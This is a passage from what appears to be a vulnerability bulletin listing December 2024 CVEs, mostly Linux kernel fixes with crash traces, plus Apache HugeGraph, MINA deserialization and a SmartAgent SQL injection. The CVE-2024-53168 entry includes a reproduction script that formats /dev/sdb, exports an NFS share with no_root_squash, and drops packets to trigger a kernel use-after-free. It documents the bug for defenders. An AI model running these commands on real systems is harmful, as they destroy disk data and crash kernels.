Authentication Bypass by Assumed-Immutable Data vulnerability in Apache HugeGraph-Server. This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.5.0. Users are recommended to upgrade to version 1.5.0, which fixes the issue. | 2024-12-24 | not yet calculated | CVE-2024-43441 |
| n/a -- n/a |
Software installed and run as a non-privileged user may conduct improper GPU system calls to trigger use-after-free kernel exceptions. | 2024-12-28 | not yet calculated | CVE-2024-46972 |
| n/a -- n/a |
SmartAgent v1.1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /tests/interface.php. | 2024-12-27 | not yet calculated | CVE-2024-50713 |
| n/a -- n/a |
The ObjectSerializationDecoder in Apache MINA uses Java's native deserialization protocol to process incoming serialized data but lacks the necessary security checks and defenses. This vulnerability allows attackers to exploit the deserialization process by sending specially crafted malicious serialized data, potentially leading to remote code execution (RCE) attacks. This issue affects MINA core versions 2.0.X, 2.1.X and 2.2.X, and will be fixed by the releases 2.0.27, 2.1.10 and 2.2.4. It's also important to note that an application using MINA core library will only be affected if the IoBuffer#getObject() method is called, and this specific method is potentially called when adding a ProtocolCodecFilter instance using the ObjectSerializationCodecFactory class in the filter chain. If your application is specifically using those classes, you have to upgrade to the latest version of MINA core library. Upgrading will not be enough: you also need to explicitly allow the classes the decoder will accept in the ObjectSerializationDecoder instance, using one of the three new methods: /** * Accept class names where the supplied ClassNameMatcher matches for * deserialization, unless they are otherwise rejected. * * @param classNameMatcher the matcher to use */ public void accept(ClassNameMatcher classNameMatcher) /** * Accept class names that match the supplied pattern for * deserialization, unless they are otherwise rejected. * * @param pattern standard Java regexp */ public void accept(Pattern pattern) /** * Accept the wildcard specified classes for deserialization, * unless they are otherwise rejected. * * @param patterns Wildcard file name patterns as defined by * {@link org.apache.commons.io.FilenameUtils#wildcardMatch(String, String) FilenameUtils.wildcardMatch} */ public void accept(String... patterns) By default, the decoder will reject *all* classes that will be present in the incoming data. Note: The FtpServer, SSHd and Vysper sub-project are not affected by this issue. | 2024-12-25 | not yet calculated | CVE-2024-52046 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: um: Fix potential integer overflow during physmem setup This issue happens when the real map size is greater than LONG_MAX, which can be easily triggered on UML/i386. | 2024-12-24 | not yet calculated | CVE-2024-53145 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: NFSD: Prevent a potential integer overflow If the tag length is >= U32_MAX - 3 then the "length + 4" addition can result in an integer overflow. Address this by splitting the decoding into several steps so that decode_cb_compound4res() does not have to perform arithmetic on the unsafe length value. | 2024-12-24 | not yet calculated | CVE-2024-53146 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: exfat: fix out-of-bounds access of directory entries In the case of the directory size is greater than or equal to the cluster size, if start_clu becomes an EOF cluster(an invalid cluster) due to file system corruption, then the directory entry where ei->hint_femp.eidx hint is outside the directory, resulting in an out-of-bounds access, which may cause further file system corruption. This commit adds a check for start_clu, if it is an invalid cluster, the file or directory will be treated as empty. | 2024-12-24 | not yet calculated | CVE-2024-53147 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: comedi: Flush partial mappings in error case If some remap_pfn_range() calls succeeded before one failed, we still have buffer pages mapped into the userspace page tables when we drop the buffer reference with comedi_buf_map_put(bm). The userspace mappings are only cleaned up later in the mmap error path. Fix it by explicitly flushing all mappings in our VMA on the error path. See commit 79a61cc3fc04 ("mm: avoid leaving partial pfn mappings around in error case"). | 2024-12-24 | not yet calculated | CVE-2024-53148 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: usb: typec: ucsi: glink: fix off-by-one in connector_status UCSI connector's indices start from 1 up to 3, PMIC_GLINK_MAX_PORTS. Correct the condition in the pmic_glink_ucsi_connector_status() callback, fixing Type-C orientation reporting for the third USB-C connector. | 2024-12-24 | not yet calculated | CVE-2024-53149 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Fix out of bounds reads when finding clock sources The current USB-audio driver code doesn't check bLength of each descriptor at traversing for clock descriptors. That is, when a device provides a bogus descriptor with a shorter bLength, the driver might hit out-of-bounds reads. For addressing it, this patch adds sanity checks to the validator functions for the clock descriptor traversal. When the descriptor length is shorter than expected, it's skipped in the loop. For the clock source and clock multiplier descriptors, we can just check bLength against the sizeof() of each descriptor type. OTOH, the clock selector descriptor of UAC2 and UAC3 has an array of bNrInPins elements and two more fields at its tail, hence those have to be checked in addition to the sizeof() check. | 2024-12-24 | not yet calculated | CVE-2024-53150 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: svcrdma: Address an integer overflow Dan Carpenter reports: > Commit 78147ca8b4a9 ("svcrdma: Add a "parsed chunk list" data > structure") from Jun 22, 2020 (linux-next), leads to the following > Smatch static checker warning: > > net/sunrpc/xprtrdma/svc_rdma_recvfrom.c:498 xdr_check_write_chunk() > warn: potential user controlled sizeof overflow 'segcount * 4 * 4' > > net/sunrpc/xprtrdma/svc_rdma_recvfrom.c > 488 static bool xdr_check_write_chunk(struct svc_rdma_recv_ctxt *rctxt) > 489 { > 490 u32 segcount; > 491 __be32 *p; > 492 > 493 if (xdr_stream_decode_u32(&rctxt->rc_stream, &segcount)) > ^^^^^^^^ > > 494 return false; > 495 > 496 /* A bogus segcount causes this buffer overflow check to fail. */ > 497 p = xdr_inline_decode(&rctxt->rc_stream, > --> 498 segcount * rpcrdma_segment_maxsz * sizeof(*p)); > > > segcount is an untrusted u32. On 32bit systems anything >= SIZE_MAX / 16 will > have an integer overflow and some those values will be accepted by > xdr_inline_decode(). | 2024-12-24 | not yet calculated | CVE-2024-53151 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: PCI: tegra194: Move controller cleanups to pex_ep_event_pex_rst_deassert() Currently, the endpoint cleanup function dw_pcie_ep_cleanup() and EPF deinit notify function pci_epc_deinit_notify() are called during the execution of pex_ep_event_pex_rst_assert() i.e., when the host has asserted PERST#. But quickly after this step, refclk will also be disabled by the host. All of the tegra194 endpoint SoCs supported as of now depend on the refclk from the host for keeping the controller operational. Due to this limitation, any access to the hardware registers in the absence of refclk will result in a whole endpoint crash. Unfortunately, most of the controller cleanups require accessing the hardware registers (like eDMA cleanup performed in dw_pcie_ep_cleanup(), etc...). So these cleanup functions can cause the crash in the endpoint SoC once host asserts PERST#. One way to address this issue is by generating the refclk in the endpoint itself and not depending on the host. But that is not always possible as some of the endpoint designs do require the endpoint to consume refclk from the host. Thus, fix this crash by moving the controller cleanups to the start of the pex_ep_event_pex_rst_deassert() function. This function is called whenever the host has deasserted PERST# and it is guaranteed that the refclk would be active at this point. So at the start of this function (after enabling resources) the controller cleanup can be performed. Once finished, rest of the code execution for PERST# deassert can continue as usual. | 2024-12-24 | not yet calculated | CVE-2024-53152 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: PCI: qcom-ep: Move controller cleanups to qcom_pcie_perst_deassert() Currently, the endpoint cleanup function dw_pcie_ep_cleanup() and EPF deinit notify function pci_epc_deinit_notify() are called during the execution of qcom_pcie_perst_assert() i.e., when the host has asserted PERST#. But quickly after this step, refclk will also be disabled by the host. All of the Qcom endpoint SoCs supported as of now depend on the refclk from the host for keeping the controller operational. Due to this limitation, any access to the hardware registers in the absence of refclk will result in a whole endpoint crash. Unfortunately, most of the controller cleanups require accessing the hardware registers (like eDMA cleanup performed in dw_pcie_ep_cleanup(), powering down MHI EPF etc...). So these cleanup functions are currently causing the crash in the endpoint SoC once host asserts PERST#. One way to address this issue is by generating the refclk in the endpoint itself and not depending on the host. But that is not always possible as some of the endpoint designs do require the endpoint to consume refclk from the host (as I was told by the Qcom engineers). Thus, fix this crash by moving the controller cleanups to the start of the qcom_pcie_perst_deassert() function. qcom_pcie_perst_deassert() is called whenever the host has deasserted PERST# and it is guaranteed that the refclk would be active at this point. So at the start of this function (after enabling resources), the controller cleanup can be performed. Once finished, rest of the code execution for PERST# deassert can continue as usual. | 2024-12-24 | not yet calculated | CVE-2024-53153 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: clk: clk-apple-nco: Add NULL check in applnco_probe Add NULL check in applnco_probe, to handle kernel NULL pointer dereference error. | 2024-12-24 | not yet calculated | CVE-2024-53154 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix uninitialized value in ocfs2_file_read_iter() Syzbot has reported the following KMSAN splat: BUG: KMSAN: uninit-value in ocfs2_file_read_iter+0x9a4/0xf80 ocfs2_file_read_iter+0x9a4/0xf80 __io_read+0x8d4/0x20f0 io_read+0x3e/0xf0 io_issue_sqe+0x42b/0x22c0 io_wq_submit_work+0xaf9/0xdc0 io_worker_handle_work+0xd13/0x2110 io_wq_worker+0x447/0x1410 ret_from_fork+0x6f/0x90 ret_from_fork_asm+0x1a/0x30 Uninit was created at: __alloc_pages_noprof+0x9a7/0xe00 alloc_pages_mpol_noprof+0x299/0x990 alloc_pages_noprof+0x1bf/0x1e0 allocate_slab+0x33a/0x1250 ___slab_alloc+0x12ef/0x35e0 kmem_cache_alloc_bulk_noprof+0x486/0x1330 __io_alloc_req_refill+0x84/0x560 io_submit_sqes+0x172f/0x2f30 __se_sys_io_uring_enter+0x406/0x41c0 __x64_sys_io_uring_enter+0x11f/0x1a0 x64_sys_call+0x2b54/0x3ba0 do_syscall_64+0xcd/0x1e0 entry_SYSCALL_64_after_hwframe+0x77/0x7f Since an instance of 'struct kiocb' may be passed from the block layer with 'private' field uninitialized, introduce 'ocfs2_iocb_init_rw_locked()' and use it from where 'ocfs2_dio_end_io()' might take care, i.e. in 'ocfs2_file_read_iter()' and 'ocfs2_file_write_iter()'. | 2024-12-24 | not yet calculated | CVE-2024-53155 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: ath9k: add range check for conn_rsp_epid in htc_connect_service() I found the following bug in my fuzzer: UBSAN: array-index-out-of-bounds in drivers/net/wireless/ath/ath9k/htc_hst.c:26:51 index 255 is out of range for type 'htc_endpoint [22]' CPU: 0 UID: 0 PID: 8 Comm: kworker/0:0 Not tainted 6.11.0-rc6-dirty #14 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 Workqueue: events request_firmware_work_func Call Trace: <TASK> dump_stack_lvl+0x180/0x1b0 __ubsan_handle_out_of_bounds+0xd4/0x130 htc_issue_send.constprop.0+0x20c/0x230 ? _raw_spin_unlock_irqrestore+0x3c/0x70 ath9k_wmi_cmd+0x41d/0x610 ? mark_held_locks+0x9f/0xe0 ... Since this bug has been confirmed to be caused by insufficient verification of conn_rsp_epid, I think it would be appropriate to add a range check for conn_rsp_epid to htc_connect_service() to prevent the bug from occurring. | 2024-12-24 | not yet calculated | CVE-2024-53156 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: firmware: arm_scpi: Check the DVFS OPP count returned by the firmware Fix a kernel crash with the below call trace when the SCPI firmware returns OPP count of zero. dvfs_info.opp_count may be zero on some platforms during the reboot test, and the kernel will crash after dereferencing the pointer to kcalloc(info->count, sizeof(*opp), GFP_KERNEL). | Unable to handle kernel NULL pointer dereference at virtual address 0000000000000028 | Mem abort info: | ESR = 0x96000004 | Exception class = DABT (current EL), IL = 32 bits | SET = 0, FnV = 0 | EA = 0, S1PTW = 0 | Data abort info: | ISV = 0, ISS = 0x00000004 | CM = 0, WnR = 0 | user pgtable: 4k pages, 48-bit VAs, pgdp = 00000000faefa08c | [0000000000000028] pgd=0000000000000000 | Internal error: Oops: 96000004 [#1] SMP | scpi-hwmon: probe of PHYT000D:00 failed with error -110 | Process systemd-udevd (pid: 1701, stack limit = 0x00000000aaede86c) | CPU: 2 PID: 1701 Comm: systemd-udevd Not tainted 4.19.90+ #1 | Hardware name: PHYTIUM LTD Phytium FT2000/4/Phytium FT2000/4, BIOS | pstate: 60000005 (nZCv daif -PAN -UAO) | pc : scpi_dvfs_recalc_rate+0x40/0x58 [clk_scpi] | lr : clk_register+0x438/0x720 | Call trace: | scpi_dvfs_recalc_rate+0x40/0x58 [clk_scpi] | devm_clk_hw_register+0x50/0xa0 | scpi_clk_ops_init.isra.2+0xa0/0x138 [clk_scpi] | scpi_clocks_probe+0x528/0x70c [clk_scpi] | platform_drv_probe+0x58/0xa8 | really_probe+0x260/0x3d0 | driver_probe_device+0x12c/0x148 | device_driver_attach+0x74/0x98 | __driver_attach+0xb4/0xe8 | bus_for_each_dev+0x88/0xe0 | driver_attach+0x30/0x40 | bus_add_driver+0x178/0x2b0 | driver_register+0x64/0x118 | __platform_driver_register+0x54/0x60 | scpi_clocks_driver_init+0x24/0x1000 [clk_scpi] | do_one_initcall+0x54/0x220 | do_init_module+0x54/0x1c8 | load_module+0x14a4/0x1668 | __se_sys_finit_module+0xf8/0x110 | __arm64_sys_finit_module+0x24/0x30 | el0_svc_common+0x78/0x170 | el0_svc_handler+0x38/0x78 | el0_svc+0x8/0x340 | Code: 937d7c00 a94153f3 a8c27bfd f9400421 (b8606820) | ---[ end trace 06feb22469d89fa8 ]--- | Kernel panic - not syncing: Fatal exception | SMP: stopping secondary CPUs | Kernel Offset: disabled | CPU features: 0x10,a0002008 | Memory Limit: none | 2024-12-24 | not yet calculated | CVE-2024-53157 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: soc: qcom: geni-se: fix array underflow in geni_se_clk_tbl_get() This loop is supposed to break if the frequency returned from clk_round_rate() is the same as on the previous iteration. However, that check doesn't make sense on the first iteration through the loop. It leads to reading before the start of these->clk_perf_tbl[] array. | 2024-12-24 | not yet calculated | CVE-2024-53158 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: hwmon: (nct6775-core) Fix overflows seen when writing limit attributes DIV_ROUND_CLOSEST() after kstrtoul() results in an overflow if a large number such as 18446744073709551615 is provided by the user. Fix it by reordering clamp_val() and DIV_ROUND_CLOSEST() operations. | 2024-12-24 | not yet calculated | CVE-2024-53159 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: rcu/kvfree: Fix data-race in __mod_timer / kvfree_call_rcu KCSAN reports a data race when access the krcp->monitor_work.timer.expires variable in the schedule_delayed_monitor_work() function: <snip> BUG: KCSAN: data-race in __mod_timer / kvfree_call_rcu read to 0xffff888237d1cce8 of 8 bytes by task 10149 on cpu 1: schedule_delayed_monitor_work kernel/rcu/tree.c:3520 [inline] kvfree_call_rcu+0x3b8/0x510 kernel/rcu/tree.c:3839 trie_update_elem+0x47c/0x620 kernel/bpf/lpm_trie.c:441 bpf_map_update_value+0x324/0x350 kernel/bpf/syscall.c:203 generic_map_update_batch+0x401/0x520 kernel/bpf/syscall.c:1849 bpf_map_do_batch+0x28c/0x3f0 kernel/bpf/syscall.c:5143 __sys_bpf+0x2e5/0x7a0 __do_sys_bpf kernel/bpf/syscall.c:5741 [inline] __se_sys_bpf kernel/bpf/syscall.c:5739 [inline] __x64_sys_bpf+0x43/0x50 kernel/bpf/syscall.c:5739 x64_sys_call+0x2625/0x2d60 arch/x86/include/generated/asm/syscalls_64.h:322 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xc9/0x1c0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f write to 0xffff888237d1cce8 of 8 bytes by task 56 on cpu 0: __mod_timer+0x578/0x7f0 kernel/time/timer.c:1173 add_timer_global+0x51/0x70 kernel/time/timer.c:1330 __queue_delayed_work+0x127/0x1a0 kernel/workqueue.c:2523 queue_delayed_work_on+0xdf/0x190 kernel/workqueue.c:2552 queue_delayed_work include/linux/workqueue.h:677 [inline] schedule_delayed_monitor_work kernel/rcu/tree.c:3525 [inline] kfree_rcu_monitor+0x5e8/0x660 kernel/rcu/tree.c:3643 process_one_work kernel/workqueue.c:3229 [inline] process_scheduled_works+0x483/0x9a0 kernel/workqueue.c:3310 worker_thread+0x51d/0x6f0 kernel/workqueue.c:3391 kthread+0x1d1/0x210 kernel/kthread.c:389 ret_from_fork+0x4b/0x60 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244 Reported by Kernel Concurrency Sanitizer on: CPU: 0 UID: 0 PID: 56 Comm: kworker/u8:4 Not tainted 6.12.0-rc2-syzkaller-00050-g5b7c893ed5ed #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 Workqueue: events_unbound kfree_rcu_monitor <snip> kfree_rcu_monitor() rearms the work if a "krcp" has to be still offloaded and this is done without holding krcp->lock, whereas the kvfree_call_rcu() holds it. Fix it by acquiring the "krcp->lock" for kfree_rcu_monitor() so both functions do not race anymore. | 2024-12-24 | not yet calculated | CVE-2024-53160 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: EDAC/bluefield: Fix potential integer overflow The 64-bit argument for the "get DIMM info" SMC call consists of mem_ctrl_idx left-shifted 16 bits and OR-ed with DIMM index. With mem_ctrl_idx defined as 32-bits wide the left-shift operation truncates the upper 16 bits of information during the calculation of the SMC argument. The mem_ctrl_idx stack variable must be defined as 64-bits wide to prevent any potential integer overflow, i.e. loss of data from upper 16 bits. | 2024-12-24 | not yet calculated | CVE-2024-53161 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: crypto: qat/qat_4xxx - fix off by one in uof_get_name() The fw_objs[] array has "num_objs" elements so the > needs to be >= to prevent an out of bounds read. | 2024-12-24 | not yet calculated | CVE-2024-53162 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: crypto: qat/qat_420xx - fix off by one in uof_get_name() This is called from uof_get_name_420xx() where "num_objs" is the ARRAY_SIZE() of fw_objs[]. The > needs to be >= to prevent an out of bounds access. | 2024-12-24 | not yet calculated | CVE-2024-53163 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: sched: fix ordering of qlen adjustment Changes to sch->q.qlen around qdisc_tree_reduce_backlog() need to happen _before_ a call to said function because otherwise it may fail to notify parent qdiscs when the child is about to become empty. | 2024-12-27 | not yet calculated | CVE-2024-53164 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: sh: intc: Fix use-after-free bug in register_intc_controller() In the error handling for this function, d is freed without ever removing it from intc_list which would lead to a use after free. To fix this, let's only add it to the list after everything has succeeded. | 2024-12-27 | not yet calculated | CVE-2024-53165 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: block, bfq: fix bfqq uaf in bfq_limit_depth() Set new allocated bfqq to bic or remove freed bfqq from bic are both protected by bfqd->lock, however bfq_limit_depth() is deferencing bfqq from bic without the lock, this can lead to UAF if the io_context is shared by multiple tasks. For example, test bfq with io_uring can trigger following UAF in v6.6: ================================================================== BUG: KASAN: slab-use-after-free in bfqq_group+0x15/0x50 Call Trace: <TASK> dump_stack_lvl+0x47/0x80 print_address_description.constprop.0+0x66/0x300 print_report+0x3e/0x70 kasan_report+0xb4/0xf0 bfqq_group+0x15/0x50 bfqq_request_over_limit+0x130/0x9a0 bfq_limit_depth+0x1b5/0x480 __blk_mq_alloc_requests+0x2b5/0xa00 blk_mq_get_new_requests+0x11d/0x1d0 blk_mq_submit_bio+0x286/0xb00 submit_bio_noacct_nocheck+0x331/0x400 __block_write_full_folio+0x3d0/0x640 writepage_cb+0x3b/0xc0 write_cache_pages+0x254/0x6c0 write_cache_pages+0x254/0x6c0 do_writepages+0x192/0x310 filemap_fdatawrite_wbc+0x95/0xc0 __filemap_fdatawrite_range+0x99/0xd0 filemap_write_and_wait_range.part.0+0x4d/0xa0 blkdev_read_iter+0xef/0x1e0 io_read+0x1b6/0x8a0 io_issue_sqe+0x87/0x300 io_wq_submit_work+0xeb/0x390 io_worker_handle_work+0x24d/0x550 io_wq_worker+0x27f/0x6c0 ret_from_fork_asm+0x1b/0x30 </TASK> Allocated by task 808602: kasan_save_stack+0x1e/0x40 kasan_set_track+0x21/0x30 __kasan_slab_alloc+0x83/0x90 kmem_cache_alloc_node+0x1b1/0x6d0 bfq_get_queue+0x138/0xfa0 bfq_get_bfqq_handle_split+0xe3/0x2c0 bfq_init_rq+0x196/0xbb0 bfq_insert_request.isra.0+0xb5/0x480 bfq_insert_requests+0x156/0x180 blk_mq_insert_request+0x15d/0x440 blk_mq_submit_bio+0x8a4/0xb00 submit_bio_noacct_nocheck+0x331/0x400 __blkdev_direct_IO_async+0x2dd/0x330 blkdev_write_iter+0x39a/0x450 io_write+0x22a/0x840 io_issue_sqe+0x87/0x300 io_wq_submit_work+0xeb/0x390 io_worker_handle_work+0x24d/0x550 io_wq_worker+0x27f/0x6c0 ret_from_fork+0x2d/0x50 ret_from_fork_asm+0x1b/0x30 Freed by task 808589: kasan_save_stack+0x1e/0x40 kasan_set_track+0x21/0x30 kasan_save_free_info+0x27/0x40 __kasan_slab_free+0x126/0x1b0 kmem_cache_free+0x10c/0x750 bfq_put_queue+0x2dd/0x770 __bfq_insert_request.isra.0+0x155/0x7a0 bfq_insert_request.isra.0+0x122/0x480 bfq_insert_requests+0x156/0x180 blk_mq_dispatch_plug_list+0x528/0x7e0 blk_mq_flush_plug_list.part.0+0xe5/0x590 __blk_flush_plug+0x3b/0x90 blk_finish_plug+0x40/0x60 do_writepages+0x19d/0x310 filemap_fdatawrite_wbc+0x95/0xc0 __filemap_fdatawrite_range+0x99/0xd0 filemap_write_and_wait_range.part.0+0x4d/0xa0 blkdev_read_iter+0xef/0x1e0 io_read+0x1b6/0x8a0 io_issue_sqe+0x87/0x300 io_wq_submit_work+0xeb/0x390 io_worker_handle_work+0x24d/0x550 io_wq_worker+0x27f/0x6c0 ret_from_fork+0x2d/0x50 ret_from_fork_asm+0x1b/0x30 Fix the problem by protecting bic_to_bfqq() with bfqd->lock. | 2024-12-27 | not yet calculated | CVE-2024-53166 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: nfs/blocklayout: Don't attempt unregister for invalid block device Since commit d869da91cccb ("nfs/blocklayout: Fix premature PR key unregistration") an unmount of a pNFS SCSI layout-enabled NFS may dereference a NULL block_device in: bl_unregister_scsi+0x16/0xe0 [blocklayoutdriver] bl_free_device+0x70/0x80 [blocklayoutdriver] bl_free_deviceid_node+0x12/0x30 [blocklayoutdriver] nfs4_put_deviceid_node+0x60/0xc0 [nfsv4] nfs4_deviceid_purge_client+0x132/0x190 [nfsv4] unset_pnfs_layoutdriver+0x59/0x60 [nfsv4] nfs4_destroy_server+0x36/0x70 [nfsv4] nfs_free_server+0x23/0xe0 [nfs] deactivate_locked_super+0x30/0xb0 cleanup_mnt+0xba/0x150 task_work_run+0x59/0x90 syscall_exit_to_user_mode+0x217/0x220 do_syscall_64+0x8e/0x160 This happens because even though we were able to create the nfs4_deviceid_node, the lookup for the device was unable to attach the block device to the pnfs_block_dev. If we never found a block device to register, we can avoid this case with the PNFS_BDEV_REGISTERED flag. Move the deref behind the test for the flag. | 2024-12-27 | not yet calculated | CVE-2024-53167 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: sunrpc: fix one UAF issue caused by sunrpc kernel tcp socket BUG: KASAN: slab-use-after-free in tcp_write_timer_handler+0x156/0x3e0 Read of size 1 at addr ffff888111f322cd by task swapper/0/0 CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.12.0-rc4-dirty #7 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 Call Trace: <IRQ> dump_stack_lvl+0x68/0xa0 print_address_description.constprop.0+0x2c/0x3d0 print_report+0xb4/0x270 kasan_report+0xbd/0xf0 tcp_write_timer_handler+0x156/0x3e0 tcp_write_timer+0x66/0x170 call_timer_fn+0xfb/0x1d0 __run_timers+0x3f8/0x480 run_timer_softirq+0x9b/0x100 handle_softirqs+0x153/0x390 __irq_exit_rcu+0x103/0x120 irq_exit_rcu+0xe/0x20 sysvec_apic_timer_interrupt+0x76/0x90 </IRQ> <TASK> asm_sysvec_apic_timer_interrupt+0x1a/0x20 RIP: 0010:default_idle+0xf/0x20 Code: 4c 01 c7 4c 29 c2 e9 72 ff ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 66 90 0f 00 2d 33 f8 25 00 fb f4 <fa> c3 cc cc cc cc 66 66 2e 0f 1f 84 00 00 00 00 00 90 90 90 90 90 RSP: 0018:ffffffffa2007e28 EFLAGS: 00000242 RAX: 00000000000f3b31 RBX: 1ffffffff4400fc7 RCX: ffffffffa09c3196 RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffffff9f00590f RBP: 0000000000000000 R08: 0000000000000001 R09: ffffed102360835d R10: ffff88811b041aeb R11: 0000000000000001 R12: 0000000000000000 R13: ffffffffa202d7c0 R14: 0000000000000000 R15: 00000000000147d0 default_idle_call+0x6b/0xa0 cpuidle_idle_call+0x1af/0x1f0 do_idle+0xbc/0x130 cpu_startup_entry+0x33/0x40 rest_init+0x11f/0x210 start_kernel+0x39a/0x420 x86_64_start_reservations+0x18/0x30 x86_64_start_kernel+0x97/0xa0 common_startup_64+0x13e/0x141 </TASK> Allocated by task 595: kasan_save_stack+0x24/0x50 kasan_save_track+0x14/0x30 __kasan_slab_alloc+0x87/0x90 kmem_cache_alloc_noprof+0x12b/0x3f0 copy_net_ns+0x94/0x380 create_new_namespaces+0x24c/0x500 unshare_nsproxy_namespaces+0x75/0xf0 ksys_unshare+0x24e/0x4f0 __x64_sys_unshare+0x1f/0x30 do_syscall_64+0x70/0x180 entry_SYSCALL_64_after_hwframe+0x76/0x7e Freed by task 100: kasan_save_stack+0x24/0x50 kasan_save_track+0x14/0x30 kasan_save_free_info+0x3b/0x60 __kasan_slab_free+0x54/0x70 kmem_cache_free+0x156/0x5d0 cleanup_net+0x5d3/0x670 process_one_work+0x776/0xa90 worker_thread+0x2e2/0x560 kthread+0x1a8/0x1f0 ret_from_fork+0x34/0x60 ret_from_fork_asm+0x1a/0x30 Reproduction script: mkdir -p /mnt/nfsshare mkdir -p /mnt/nfs/netns_1 mkfs.ext4 /dev/sdb mount /dev/sdb /mnt/nfsshare systemctl restart nfs-server chmod 777 /mnt/nfsshare exportfs -i -o rw,no_root_squash *:/mnt/nfsshare ip netns add netns_1 ip link add name veth_1_peer type veth peer veth_1 ifconfig veth_1_peer 11.11.0.254 up ip link set veth_1 netns netns_1 ip netns exec netns_1 ifconfig veth_1 11.11.0.1 ip netns exec netns_1 /root/iptables -A OUTPUT -d 11.11.0.254 -p tcp \ --tcp-flags FIN FIN -j DROP (note: In my environment, a DESTROY_CLIENTID operation is always sent immediately, breaking the nfs tcp connection.) ip netns exec netns_1 timeout -s 9 300 mount -t nfs -o proto=tcp,vers=4.1 \ 11.11.0.254:/mnt/nfsshare /mnt/nfs/netns_1 ip netns del netns_1 The reason here is that the tcp socket in netns_1 (nfs side) has been shutdown and closed (done in xs_destroy), but the FIN message (with ack) is discarded, and the nfsd side keeps sending retransmission messages. As a result, when the tcp sock in netns_1 processes the received message, it sends the message (FIN message) in the sending queue, and the tcp timer is re-established. When the network namespace is deleted, the net structure accessed by tcp's timer handler function causes problems. To fix this problem, let's hold netns refcnt for the tcp kernel socket as done in other modules. This is an ugly hack which can easily be backported to earlier kernels. A proper fix which cleans up the interfaces will follow, but may not be so easy to backport. | 2024-12-27 | not yet calculated | CVE-2024-53168 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: nvme-fabrics: fix kernel crash while shutting down controller The nvme keep-alive operation, which executes at a periodic interval, could potentially sneak in while shutting down a fabric controller. This may lead to a race between the fabric controller admin queue destroy code path (invoked while shutting down controller) and hw/hctx queue dispatcher called from the nvme keep-alive async request queuing operation. This race could lead to the kernel crash shown below: Call Trace: autoremove_wake_function+0x0/0xbc (unreliable) __blk_mq_sched_dispatch_requests+0x114/0x24c blk_mq_sched_dispatch_requests+0x44/0x84 blk_mq_run_hw_queue+0x140/0x220 nvme_keep_alive_work+0xc8/0x19c [nvme_core] process_one_work+0x200/0x4e0 worker_thread+0x340/0x504 kthread+0x138/0x140 start_kernel_thread+0x14/0x18 While shutting down fabric controller, if nvme keep-alive request sneaks in then it would be flushed off. The nvme_keep_alive_end_io function is then invoked to handle the end of the keep-alive operation which decrements the admin->q_usage_counter and assuming this is the last/only request in the admin queue then the admin->q_usage_counter becomes zero. If that happens then blk-mq destroy queue operation (blk_mq_destroy_ queue()) which could be potentially running simultaneously on another cpu (as this is the controller shutdown code path) would forward progress and deletes the admin queue. So, now from this point onward we are not supposed to access the admin queue resources. However the issue here's that the nvme keep-alive thread running hw/hctx queue dispatch operation hasn't yet finished its work and so it could still potentially access the admin queue resource while the admin queue had been already deleted and that causes the above crash. The above kernel crash is regression caused due to changes implemented in commit a54a93d0e359 ("nvme: move stopping keep-alive into nvme_uninit_ctrl()"). Ideally we should stop keep-alive before destroyin g the admin queue and freeing the admin tagset so that it wouldn't sneak in during the shutdown operation. However we removed the keep alive stop operation from the beginning of the controller shutdown code path in commit a54a93d0e359 ("nvme: move stopping keep-alive into nvme_uninit_ctrl()") and added it under nvme_uninit_ctrl() which executes very late in the shutdown code path after the admin queue is destroyed and its tagset is removed. So this change created the possibility of keep-alive sneaking in and interfering with the shutdown operation and causing observed kernel crash. To fix the observed crash, we decided to move nvme_stop_keep_alive() from nvme_uninit_ctrl() to nvme_remove_admin_tag_set(). This change would ensure that we don't forward progress and delete the admin queue until the keep- alive operation is finished (if it's in-flight) or cancelled and that would help contain the race condition explained above and hence avoid the crash. Moving nvme_stop_keep_alive() to nvme_remove_admin_tag_set() instead of adding nvme_stop_keep_alive() to the beginning of the controller shutdown code path in nvme_stop_ctrl(), as was the case earlier before commit a54a93d0e359 ("nvme: move stopping keep-alive into nvme_uninit_ctrl()"), would help save one callsite of nvme_stop_keep_alive(). | 2024-12-27 | not yet calculated | 